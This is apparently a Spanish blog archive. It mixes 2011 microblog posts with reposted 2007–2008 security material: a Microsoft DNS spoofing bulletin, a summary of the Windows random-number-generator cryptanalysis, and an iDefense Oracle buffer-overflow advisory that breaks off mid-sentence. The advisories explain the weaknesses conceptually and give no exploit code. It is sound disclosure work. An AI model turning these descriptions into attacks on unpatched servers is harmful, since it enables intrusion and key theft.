Asterisk Over Flow - Juan Fernando Villa

2011-04-12T22:12:00.001-07:00

http://ping.fm/l58mH

2011-04-12T22:00:00.001-07:00

Por fin, disponible CentOS 5.6 http://ping.fm/9FbJ8

2011-04-12T21:55:00.001-07:00

Navega y visualiza los archivos con Terminal Preview http://ping.fm/DYlbi

2011-04-12T21:35:00.001-07:00

http://ping.fm/KWnNW

2011-04-12T21:31:00.001-07:00

Software Libre y su Nuevo Entorno http://ping.fm/W9haw

2011-03-16T15:17:00.001-07:00

montt en dosis diarias - 2011-03-15 http://ping.fm/MbXDA

2011-03-01T19:06:00.001-08:00

montt en dosis diarias - 2011-01-17 http://ping.fm/eATnB

2011-03-01T19:03:00.003-08:00

montt en dosis diarias - 2011-01-24 http://ping.fm/X0F5s

2011-03-01T19:03:00.001-08:00

montt en dosis diarias - 2011-01-26 http://ping.fm/2YgkT

2011-03-01T19:02:00.001-08:00

montt en dosis diarias - 2011-01-27 http://ping.fm/M6Z5R

2011-03-01T18:45:00.001-08:00

montt en dosis diarias - 2011-01-31 http://ping.fm/nNTKv

2011-03-01T18:44:00.001-08:00

montt en dosis diarias - 2011-02-02 http://ping.fm/mPgFg

2011-03-01T18:43:00.001-08:00

montt en dosis diarias - 2011-02-15 http://ping.fm/VI1Gj

2011-03-01T18:42:00.001-08:00

montt en dosis diarias - 2011-02-16 http://ping.fm/KHP38

2011-03-01T18:41:00.003-08:00

montt en dosis diarias - 2011-02-23 http://ping.fm/8o1Xt

2011-03-01T18:41:00.001-08:00

montt en dosis diarias - 2011-02-24 http://ping.fm/QiMu4

2011-03-01T18:39:00.001-08:00

montt en dosis diarias - 2011-02-25 http://ping.fm/5gmPE

2011-03-01T18:37:00.001-08:00

montt en dosis diarias - 2011-03-02 http://ping.fm/4CIqm

2011-02-22T13:34:00.001-08:00

Tarde lluviosa #jfvilla

2011-02-22T13:02:00.001-08:00

Buenas Tardes a todos #jfvilla

2011-02-14T09:47:00.003-08:00

Gabriel Jaime Rico Alcalde Archivo de Audio de la W http://goo.gl/ORwuL #RicoAlcalde

2011-02-14T09:47:00.001-08:00

Gabriel Jaime Rico Alcalde en la W http://goo.gl/ORwuL #RicoAlcalde

2011-02-13T19:35:00.001-08:00

el que pega primero pega dos veces...

2011-02-12T18:53:00.001-08:00

Se lavó con negro de embolar zapatos
Porque su mamita no le dio jabón
Y cuando cazaban ratones los gatos
Espantaba al gato gritando ratón

2011-02-12T08:22:00.001-08:00

Buenos dias

2011-02-10T16:10:00.001-08:00

Pregunta: los rumores de Medellín o de alguien? si hubiese una WIKILEAKS de Medellín quien cree seria el mas nombrado? #wikileaksmedellin

2011-02-07T15:43:00.001-08:00

Estamos Transmitiendo en streaming el evento Innovación y Living Labs http://goo.gl/F4oGr

2011-02-07T15:33:00.001-08:00

Innovacion abierta y Living Labs @MedellinDigital #livinglabantioquia http://goo.gl/F4oGr

2011-02-07T14:21:00.001-08:00

preguntas para el evento @MedellinDigital #livinglabantioquia http://goo.gl/F4oGr

2011-02-07T14:04:00.001-08:00

Comenzo el evento! Innovación abierta y Living labs - Museo de Arte Moderno Ciudad del Río #livinglabantioquia http://goo.gl/F4oGr

2011-02-07T14:03:00.001-08:00

Innovación abierta y Living labs #livinglabantioquiahttp://goo.gl/F4oGr
conversatorio 6pm

Vulnerability in DNS Allows Spoofing (MS07-062)

2008-02-08T07:14:00.000-08:00

Tomado de: http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx

TechNet Home > TechNet Security > Bulletins

Microsoft Security Bulletin MS07-062 – Important

Vulnerability in DNS Could Allow Spoofing (941672)

Published: November 13, 2007

Version: 1.0

General Information

Executive Summary

This important security update resolves a privately reported vulnerability. This spoofing vulnerability exists in Windows DNS Servers and could allow an attacker to send specially crafted responses to DNS requests, thereby spoofing or redirecting Internet traffic from legitimate locations.

This is an important security update for all supported editions of Microsoft Windows 2000 Server and Windows Server 2003. For more information, see the subsection, Affected and Non-Affected Software, in this section.

This security update addresses the vulnerability by increasing the randomness of DNS transaction IDs. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.

Recommendation: Microsoft recommends that customers apply the update at the earliest opportunity.

Known Issues: None

Top of section

Affected and Non-Affected Software

The software listed here has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.

Affected Software

Operating System	Maximum Security Impact	Aggregate Severity Rating	Bulletins Replaced by This Update
Microsoft Windows 2000 Server Service Pack 4	Spoofing	Important	MS07-029
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2	Spoofing	Important	MS07-029
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2	Spoofing	Important	MS07-029
Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems	Spoofing	Important	MS07-029

Non-Affected Software

Operating System
Microsoft Windows 2000 Professional Service Pack 4
Windows XP Service Pack 2
Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2
Windows Vista
Windows Vista x64

Top of section

Frequently Asked Questions (FAQ) Related to This Security Update

Vulnerability Information

Severity Ratings and Vulnerability Identifiers

Vulnerability Severity Rating and Maximum Security Impact by Affected Software
Microsoft Windows 2000 Server Service Pack 4	Important Spoofing	Important
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2	Important Spoofing	Important
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2	Important Spoofing	Important
Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems	Important Spoofing	Important

DNS Spoofing Attack Vulnerability – CVE-2007-3898

A spoofing vulnerability exists in Windows DNS Servers. The vulnerability could allow non-privileged users to send malicious responses to DNS requests, thereby spoofing or redirecting Internet traffic from legitimate locations.

To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2007-3898.

Mitigating Factors for DNS Spoofing Attack Vulnerability – CVE-2007-3898

Workarounds for DNS Spoofing Attack Vulnerability – CVE-2007-3898

FAQ for DNS Spoofing Attack Vulnerability – CVE-2007-3898

What is the scope of the vulnerability?
A spoofing vulnerability exists in Windows DNS Severs. An attacker who successfully exploited this vulnerability could impersonate a legitimate address.

What causes the vulnerability?
The Windows DNS Server service doesn’t provide enough entropy in its random choice of transaction values when it sends out queries to upstream DNS servers.

What might an attacker use the vulnerability to do?
An attacker who successfully exploited this vulnerability could gain information about the DNS server’s transaction IDs, and use that information to send malicious responses to DNS requests, thus redirecting Internet traffic from legitimate locations to an address of the attacker’s choice.

How could an attacker exploit the vulnerability?
An attacker who successfully exploited this vulnerability could respond to a DNS query with false or misleading information, thereby redirecting Internet traffic from legitimate locations.

Could the vulnerability be exploited over the Internet?
Yes, an attacker could exploit this vulnerability over the Internet by sending specific responses to an Internet-facing DNS server that is performing recursive lookups.

What systems are primarily at risk from the vulnerability?
This vulnerability applies to Windows DNS servers that perform recursive lookups. For more information on recursive queries, please refer to the Technet article on How DNS query works.

What does the update do?
The update removes this vulnerability by increasing the randomness of the transaction IDs in recursive DNS server communications.

When this security bulletin was issued, had this vulnerability been publicly disclosed?
No. Microsoft received information about this vulnerability through responsible disclosure.

When this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited?
No. Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.

Top of section

Update Information

Detection and Deployment Tools and Guidance

Manage the software and security updates you need to deploy to the servers, desktop, and mobile computers in your organization. For more information see the TechNet Update Management Center. The Microsoft TechNet Security Web site provides additional information about security in Microsoft products.

Security updates are available from Microsoft Update, Windows Update, and Office Update. Security updates are also available from the Microsoft Download Center. You can find them most easily by doing a keyword search for "security update."

Finally, security updates can be downloaded from the Microsoft Update Catalog. The Microsoft Update Catalog provides a searchable catalog of content made available through Windows Update and Microsoft Update, including security updates, drivers and service packs. By searching using the security bulletin number (such as, “MS07-036”), you can add all of the applicable updates to your basket (including different languages for an update), and download to the folder of your choosing. For more information about the Microsoft Update Catalog, see the Microsoft Update Catalog FAQ.

Detection and Deployment Guidance

Microsoft has provided detection and deployment guidance for this month’s security updates. This guidance will also help IT professionals understand how they can use various tools to help deploy the security update, such as Windows Update, Microsoft Update, Office Update, the Microsoft Baseline Security Analyzer (MBSA), the Office Detection Tool, Microsoft Systems Management Server (SMS), and the Extended Security Update Inventory Tool. For more information, see Microsoft Knowledge Base Article 910723.

Microsoft Baseline Security Analyzer

Microsoft Baseline Security Analyzer (MBSA) allows administrators to scan local and remote systems for missing security updates as well as common security misconfigurations. For more information about MBSA, visit Microsoft Baseline Security Analyzer.

The following table provides the MBSA detection summary for this security update.

Software	MBSA 2.0.1
Microsoft Windows 2000 Server Service Pack 4	Yes
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2	Yes
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2	Yes
Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems	Yes

Windows Server Update Services

By using Windows Server Update Services (WSUS), administrators can deploy the latest critical updates and security updates for Windows 2000 operating systems and later, Office XP and later, Exchange Server 2003, and SQL Server 2000 to Windows 2000 and later operating systems. For more information about how to deploy this security update using Windows Server Update Services, visit the Windows Server Update Services Web site.

Systems Management Server

The following table provides the SMS detection and deployment summary for this security update.

Product	SMS 2.0	SMS 2003
Microsoft Windows 2000 Server Service Pack 4	Yes	Yes
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2	Yes	Yes
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2	No	Yes
Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems	No	Yes

For SMS 2.0, the SMS SUS Feature Pack, which includes the Security Update Inventory Tool (SUIT), can be used by SMS to detect security updates. See also Downloads for Systems Management Server 2.0.

For SMS 2003, the SMS 2003 Inventory Tool for Microsoft Updates (ITMU) can be used by SMS to detect security updates that are offered by Microsoft Update and that are supported by Windows Server Update Services. For more information about the SMS 2003 ITMU, see SMS 2003 Inventory Tool for Microsoft Updates. SMS 2003 can also use the Microsoft Office Inventory Tool to detect required updates for Microsoft Office applications. For more information about the Office Inventory Tool and other scanning tools, see SMS 2003 Software Update Scanning Tools. See also Downloads for Systems Management Server 2003.

For more information about SMS, visit the SMS Web site.

For more detailed information, see Microsoft Knowledge Base Article 910723: Summary list of monthly detection and deployment guidance articles.

Top of section

Security Update Deployment

Affected Software

For information about the specific security update for your affected software, click the appropriate link:

Microsoft Windows 2000 Server Service Pack 4

Reference Table

The following table contains the security update information for this software. You can find additional information in the subsection, Deployment Information, in this section.

Inclusion in Future Service Packs	The update for this issue may be included in a future update rollup
Deployment
Installing without user intervention	Windows 2000 Server Service Pack 4: Windows2000-kb941672-x86-enu /quiet
Installing without restarting	Windows 2000 Server Service Pack 4: Windows2000-kb941672-x86-enu /norestart
Further information	See the subsection, Microsoft Detection and Deployment Tools and Guidance
Update log File	KB941672.log
Restart Requirement
Restart required	Yes, you must restart your system after you apply this security update
Hotpatching	Not applicable
Removal Information	Use Add or Remove Programs tool in Control Panel or the Spuninst.exe utility located in the %Windir%\$NTUninstallKB941672$\Spuninst folder
File Information	See the next subsection, File Information for the full file manifest
Registry Key Verification	Windows 2000 Server Service Pack 4: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5\KB941672\Filelist

File Information

File Name	Version	Date	Time	Size
dns.exe	5.0.2195.7147	18-Oct-2007	03:39	330512

Deployment Information

Installing the Update

When you install this security update, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.

For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.

This security update supports the following setup switches.

Supported Security Update Installation Switches
Switch	Description
/help	Displays the command-line options
Setup Modes
/passive	Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet	Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart	Does not restart when installation has completed
/forcerestart	Restarts the computer after installation and force other applications to close at shutdown without saving open files first.
/warnrestart[:x]	Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart	Display a dialog box prompting the local user to allow a restart
Special Options
/overwriteoem	Overwrites OEM files without prompting
/nobackup	Does not back up files needed for uninstall
/forceappsclose	Forces other programs to close when the computer shuts down
/log:path	Allows the redirection of installation log files
/extract[:path]	Extracts files without starting the Setup program
/ER	Enables extended error reporting
/verbose	Enables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.

Note You can combine these switches into one command. For backward compatibility, the security update also supports the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.

Removing the Update

This security update supports the following setup switches.

Supported Spuninst.exe Switches
Switch	Description
/help	Displays the command-line options
Setup Modes
/passive	Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet	Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart	Does not restart when installation has completed
/forcerestart	Restarts the computer after installation and force other applications to close at shutdown without saving open files first.
/warnrestart[:x]	Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart	Display a dialog box prompting the local user to allow a restart
Special Options
/forceappsclose	Forces other programs to close when the computer shuts down
/log:path	Allows the redirection of installation log files

Verifying That the Update Has Been Applied

•

Microsoft Baseline Security Analyzer

To verify that a security update has been applied to an affected system, you may be able to use the Microsoft Baseline Security Analyzer (MBSA) tool. See the section, Detection and Deployment Tools and Guidance, earlier in this bulletin for more information.

•

File Version Verification

Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.

1.	Click Start, and then click Search.
2.	In the Search Results pane, click All files and folders under Search Companion.
3.	In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.
4.	In the list of files, right-click a file name from the appropriate file information table, and then click Properties. Note Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.
5.	On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table. Note Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.

•

Registry Key Verification

You may also be able to verify the files that this security update has installed by reviewing the registry keys listed in the Reference Table in this section.

These registry keys may not contain a complete list of installed files. Also, these registry keys may not be created correctly when an administrator or an OEM integrates or slipstreams this security update into the Windows installation source files.

Top of section

Microsoft Windows Server 2003 (all editions)

Reference Table

The following table contains the security update information for this software. You can find additional information in the subsection, Deployment Information, in this section.

Inclusion in Future Service Packs	The update for this issue may be included in a future update rollup
Deployment
Installing without user intervention	For all supported 32-bit editions of Windows Server 2003: Windowsserver2003-kb941672-x86-enu /quiet For all supported Itanium-based editions of Windows Server 2003: WindowsServer2003-KB941672-ia64-enu /quiet For all supported x64-based editions of Windows Server 2003: WindowsServer2003.WindowsXP-KB941672-x64-enu /quiet
Installing without restarting	For all supported 32-bit editions of Windows Server 2003: Windowsserver2003-kb941672-x86-enu /norestart For all supported Itanium-based editions of Windows Server 2003: WindowsServer2003-KB941672-ia64-enu /norestart For all supported x64-based editions of Windows Server 2003: WindowsServer2003.WindowsXP-KB941672-x64-enu /norestart
Further information	See the subsection, Microsoft Detection and Deployment Tools and Guidance
Update Log File	KB941672.log
Restart Requirement
Restart required	Yes, you must restart your system after you apply this security update. See Restart Note below for more information.
Hotpatching	This security update does not support HotPatching. For more information about HotPatching see Microsoft Knowledge Base Article 897341.
Removal Information	For all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003: Use Add or Remove Programs tool in Control Panel or the Spuninst.exe utility located in the Use the Spuninst.exe utility, located in the %Windir%\$NTUninstallKB941672$\Spuninst folder
File Information	See the next subsection, File Information for the full file manifest
Registry Key Verification	For all supported 32-bit editions, x64-based editions, and Itanium-based editions of Windows Server 2003: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows Server 2003\SP3\KB941672\Filelist

Restart Note: A system restart can be avoided for Windows Server 2003 by stopping the DNS service, installing the update, and then restarting the DNS service. If the DNS service is not stopped before installing the update, then a system restart will still be required.

File Information

The English version of this security update has the file attributes that are listed in the following table. The dates and times for these files are listed in coordinated universal time (UTC). When you view the file information, it is converted to local time. To find the difference between UTC and local time, use the Time Zone tab in the Date and Time tool in Control Panel.

For all supported 32-bit editions of Windows Server 2003:

File Name	Version	Date	Time	Size	Folder
dns.exe	5.2.3790.3027	16-Oct-2007	17:27	444,928	SP1GDR
dns.exe	5.2.3790.3027	16-Oct-2007	19:05	445,440	SP1QFE
w03a2409.dll	5.2.3790.2957	18-Jun-2007	11:31	28,672	SP1QFE
dns.exe	5.2.3790.4171	16-Oct-2007	17:52	445,440	SP2GDR
dns.exe	5.2.3790.4171	16-Oct-2007	21:20	445,952	SP2QFE
w03a2409.dll	5.2.3790.4106	28-Jun-2007	14:33	453,632	SP2QFE

For all supported x64-based editions of Windows Server 2003:

File Name	Version	Date	Time	Size	CPU	Folder
dns.exe	5.2.3790.3027	17-Oct-2007	18:02	763,392	X64	SP1GDR
wdns.exe	5.2.3790.3027	17-Oct-2007	18:02	444,928	X86	SP1GDR\wow
dns.exe	5.2.3790.3027	17-Oct-2007	18:03	765,440	X64	SP1QFE
w03a2409.dll	5.2.3790.2957	17-Oct-2007	18:03	29,184	X64	SP1QFE
wdns.exe	5.2.3790.3027	17-Oct-2007	18:03	445,440	X86	SP1QFE\wow
ww03a2409.dll	5.2.3790.2957	17-Oct-2007	18:03	28,672	X86	SP1QFE\wow
dns.exe	5.2.3790.4171	17-Oct-2007	18:10	764,416	X64	SP2GDR
dns.exe	5.2.3790.4171	17-Oct-2007	18:02	765,952	X64	SP2QFE
w03a2409.dll	5.2.3790.4082	17-Oct-2007	18:02	454,144	X64	SP2QFE
ww03a2409.dll	5.2.3790.4106	17-Oct-2007	18:02	453,632	X86	SP2QFE\wow

For all supported Itanium-based editions of Windows Server 2003:

File Name	Version	Date	Time	Size	CPU	Folder
dns.exe	5.2.3790.3027	17-Oct-2007	18:04	1,129,472	IA-64	SP1GDR
wdns.exe	5.2.3790.3027	17-Oct-2007	18:04	444,928	X86	SP1GDR\wow
dns.exe	5.2.3790.3027	17-Oct-2007	18:04	1,132,544	IA-64	SP1QFE
w03a2409.dll	5.2.3790.2957	17-Oct-2007	18:04	27,648	IA-64	SP1QFE
wdns.exe	5.2.3790.3027	17-Oct-2007	18:04	445,440	X86	SP1QFE\wow
ww03a2409.dll	5.2.3790.2957	17-Oct-2007	18:04	28,672	X86	SP1QFE\wow
dns.exe	5.2.3790.4171	17-Oct-2007	18:10	1,131,520	IA-64	SP2GDR
dns.exe	5.2.3790.4171	17-Oct-2007	18:04	1,132,544	IA-64	SP2QFE
w03a2409.dll	5.2.3790.4082	17-Oct-2007	18:04	452,608	IA-64	SP2QFE
ww03a2409.dll	5.2.3790.4106	17-Oct-2007	18:04	453,632	X86	SP2QFE\wow

Note For a complete list of supported versions, see the Support Lifecycle Index. For a complete list of service packs, see Lifecycle Supported Service Packs. For more information on the support lifecycle policy, see Microsoft Support Lifecycle.

Top of section

Deployment Information

Installing the Update

When you install this security update, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.

For more information about the terminology that appears in this bulletin, such as hotfix, see Microsoft Knowledge Base Article 824684.

This security update supports the following setup switches.

Supported Security Update Installation Switches
Switch	Description
/help	Displays the command-line options
Setup Modes
/passive	Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet	Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart	Does not restart when installation has completed
/forcerestart	Restarts the computer after installation and force other applications to close at shutdown without saving open files first.
/warnrestart[:x]	Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart	Display a dialog box prompting the local user to allow a restart
Special Options
/overwriteoem	Overwrites OEM files without prompting
/nobackup	Does not back up files needed for uninstall
/forceappsclose	Forces other programs to close when the computer shuts down
/log:path	Allows the redirection of installation log files
/integrate:path	Integrates the update into the Windows source files. These files are located at the path that is specified in the switch.
/extract[:path]	Extracts files without starting the Setup program
/ER	Enables extended error reporting
/verbose	Enables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.

Note You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see Microsoft Knowledge Base Article 262841. For more information about the Update.exe installer, visit the Microsoft TechNet Web site.

Removing the Update

This security update supports the following setup switches.

Supported Spuninst.exe Switches
Switch	Description
/help	Displays the command-line options
Setup Modes
/passive	Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.
/quiet	Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.
Restart Options
/norestart	Does not restart when installation has completed
/forcerestart	Restarts the computer after installation and force other applications to close at shutdown without saving open files first.
/warnrestart[:x]	Presents a dialog box with a timer warning the user that the computer will restart in x seconds. (The default setting is 30 seconds.) Intended for use with the /quiet switch or the /passive switch.
/promptrestart	Display a dialog box prompting the local user to allow a restart
Special Options
/forceappsclose	Forces other programs to close when the computer shuts down
/log:path	Allows the redirection of installation log files

Verifying that the Update Has Been Applied

•

Microsoft Baseline Security Analyzer

•

File Version Verification

Because there are several versions of Microsoft Windows, the following steps may be different on your computer. If they are, see your product documentation to complete these steps.

1.	Click Start, and then click Search.
2.	In the Search Results pane, click All files and folders under Search Companion.
3.	In the All or part of the file name box, type a file name from the appropriate file information table, and then click Search.
4.	In the list of files, right-click a file name from the appropriate file information table, and then click Properties. Note Depending on the version of the operating system or programs installed, some of the files that are listed in the file information table may not be installed.
5.	On the Version tab, determine the version of the file that is installed on your computer by comparing it to the version that is documented in the appropriate file information table. Note Attributes other than the file version may change during installation. Comparing other file attributes to the information in the file information table is not a supported method of verifying that the update has been applied. Also, in certain cases, files may be renamed during installation. If the file or version information is not present, use one of the other available methods to verify update installation.

•

Registry Key Verification

You may also be able to verify the files that this security update has installed by reviewing the registry keys listed in the Reference Table in this section.

Top of section

Other Information

Acknowledgments

Microsoft thanks the following for working with us to help protect customers:

•	Alla Berzroutchko of Scanit for reporting the DNS Spoofing Attack Vulnerability – (CVE-2007-3898).
•	Amit Klein of Trusteer for reporting the DNS Spoofing Attack Vulnerability – (CVE-2007-3898).
•	Roy Arends of Nominet UK for reporting the DNS Spoofing Attack Vulnerability – (CVE-2007-3898).

Top of section

Support

•	Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.
•	International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.

Top of section

Disclaimer

The information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Top of section

Revisions

•	V1.0 (November 13, 2007): Bulletin published.

Top of section

Top of page

Cryptanalysis of the Random Number Generator of the Windows Operating System

2008-02-08T07:12:00.000-08:00

Tomado de: http://www.securiteam.com/securityreviews/6V00B0UKAI.html

The pseudo-random number generator (PRNG) used by the Windows operating system is the most commonly used PRNG. The pseudo-randomness of the output of this generator is crucial for the security of almost any application running in Windows. Nevertheless, its exact algorithm was never published.

We examined the binary code of a distribution of Windows 2000, which is still the second most popular operating system after Windows XP. (This investigation was done without any help from Microsoft.) We reconstructed, for the first time, the algorithm used by the pseudo-random number generator (namely, the function CryptGenRandom). We analyzed the security of the algorithm and found a non-trivial attack: given the internal state of the generator, the previous state can be computed in $O(2^{23})$ work (this is an attack on the forward-security of the generator, an $O(1)$ attack on backward security is trivial). The attack on forward-security demonstrates that the design of the generator is flawed, since it is well known how to prevent such attacks.

We also analyzed the way in which the generator is run by the operating system, and found that it amplifies the effect of the attacks: The generator is run in user mode rather than in kernel mode, and therefore it is easy to access its state even without administrator privileges. The initial values of part of the state of the generator are not set explicitly, but rather are defined by whatever values are present on the stack when the generator is called.Furthermore, each process runs a different copy of the generator, and the state of the generator is refreshed with system generated entropy only after generating 128 KBytes of output for the process running it. The result of combining this observation with our attack is that learning a single state may reveal 128 Kbytes of the past and future output of the generator.

The implication of these findings is that a buffer overflow attack or a similar attack can be used to learn a single state of the generator, which can then be used to predict all random values, such as SSL keys, used by a process in all its past and future operation. This attack is more severe and more efficient than known attacks, in which an attacker can only learn SSL keys if it is controlling the attacked machine at the time the keys are used.

Credit:
The information has been provided by Leo Dorrendorf and Zvi Gutterman and Benny Pinkas.
The original article can be found at: http://eprint.iacr.org/2007/419

Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!

Conclusions
WRNG design. The paper presents a clear description of the WRNG, the most frequently used PRNG. The WRNG has a complex layered architecture which includes entropy rekeying every 128 KBytes of output, and uses RC4 and SHA-1 as building blocks. Windows runs the WRNG in user space, and keeps a different instance of the generator for every process.

Attacks. The WRNG depends on the use of RC4, which does not provide any forward security. We used this fact to show how an adversary which learns the state of the WRNG can compute past and future outputs of the generator. The attacker can learn future outputs in O(1) time and compute past outputs in O(223) time. These attacks can be run within seconds or minutes on a modern PC and enable such an attacker to learn the values of cryptographic keys generated by the generator. The attacks on both forward and backward security reveal all outputs until the time the generator is rekeyed with system entropy. Given the way in which the operating system operates the generator, this means that a single attack reveals 128 KBytes of generator output for every process.

Code analysis. Our research is based on studying the WRNG by examining its binary code. We were not provided with any help from Microsoft and were only using the binary versions of Windows. To verify our findings we developed a user mode simulator which captures WRNG states and computes future and past outputs of the WRNG. We validated the simulator output against real runs of the WRNG. WRNG versus LRNG. We compared between the pseudo-random generators used by Windows and Linux (WRNG vs. LRNG). The forward security attack on the WRNG is faster by a factor of O(240) compared to the attack on the LRNG. In addition, our findings show that the LRNG has better usage of operating system entropy, uses asynchronous entropy feedings, uses the extraction process as an entropy source, and shares its output between multiple processes. As a result, a forward security attack on the WRNG reveals longer sequences of generator output, compared to an attack on the LRNG.

Recommendations
Forward security. The most obvious recommendation is to change the algorithm used by the WRNG to one which provides forward security. This can be done by making local changes to the current implementation of the generator, or by replacing RC4 with a function which provides forward security. Alternatively, it is possible to use the transformation of [4] which transforms any standard generator to one providing forward security. We believe however that it is preferable to replace the entire algorithm used by the generator with a simpler algorithm which is rigorously analyzed. A good approach is to adopt the Barak-Halevi construction. That construction, suggested in [2], is a simple yet powerful construction of entropy based PRNGs. Its design is much simpler to implement than the current WRNG implementation and, assuming that its building blocks are secure, it provably preserves both forward and backward security. It can be implemented using, say, AES and a simple entropy extractor.

Frequency of entropy based rekeys. The generator should rekey its state more often. We also suggest that rekeys are forced based on the amount of time that has passed since the last rekey. It is important to note that entropy based rekeys are required in order to limit the effect of attacks mounted by an adversary which obtains the state of the generator. (In a good generator, forward security and pseudo-randomness are guaranteed by the function which advances the state, and are ensured even if the generator generates megabytes or gigabytes of output between rekeys.) The risk of an adversary getting hold of the state seems to be more dependent on the amount of time the system runs, than on the length of the output of the generator. It therefore makes sense to force rekeys every some time interval, rather than deciding whether to rekey based on the amount of output produced by the generator.

Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability

2008-02-08T07:08:00.000-08:00

Tomado de:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=622

PUBLIC ADVISORY: 11.07.07

Home // Current Intelligence // Vulnerability Advisories // Public Advisory: 11.07.07

Oracle 10g R2 PITRIG_DROPMETADATA Buffer Overflow Vulnerability

I. BACKGROUND

Oracle Database Server is a family of database products that range from personal databases to enterprise solutions. Further information is available at the following URL.

http://www.oracle.com/database/index.html

II. DESCRIPTION

Remote exploitation of a buffer overflow in the XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure in Oracle Corp.'s Database 10gR2 could allow a user with an authenticated session to execute arbitrary code in the context of the database account.

The XDB_PITRIG_PKG.PITRIG_DROPMETADATA procedure takes two arguments, OWNER and NAME. The lengths of these arguments are used by an internal function to construct an SQL query without being adequately sanitized. If the combined length of the two fields is too large, a buffer overflow occurs, allowing arbitrary code execution.

III. ANALYSIS

Exploitation of this vulnerability allows an authenticated remote user to execute code on the underlying system in the context of the database account. Other than access to execute the vulnerable function, this vulnerability does not require any special privileges. From the database user account, an attacker can then access or modify the database and files related to its operation.

IV. DETECTION

iDefense has confirmed this vulnerability on Oracle Database 10g Release 2 with all Critical Patch Updates as of February 2007. Previous versions are suspected to be vulnerable.

V. WORKAROUND

iDefense is not aware of any effective workaround for this vulnerability.

VI. VENDOR RESPONSE

Oracle Corp. has been contacted and stated the following.

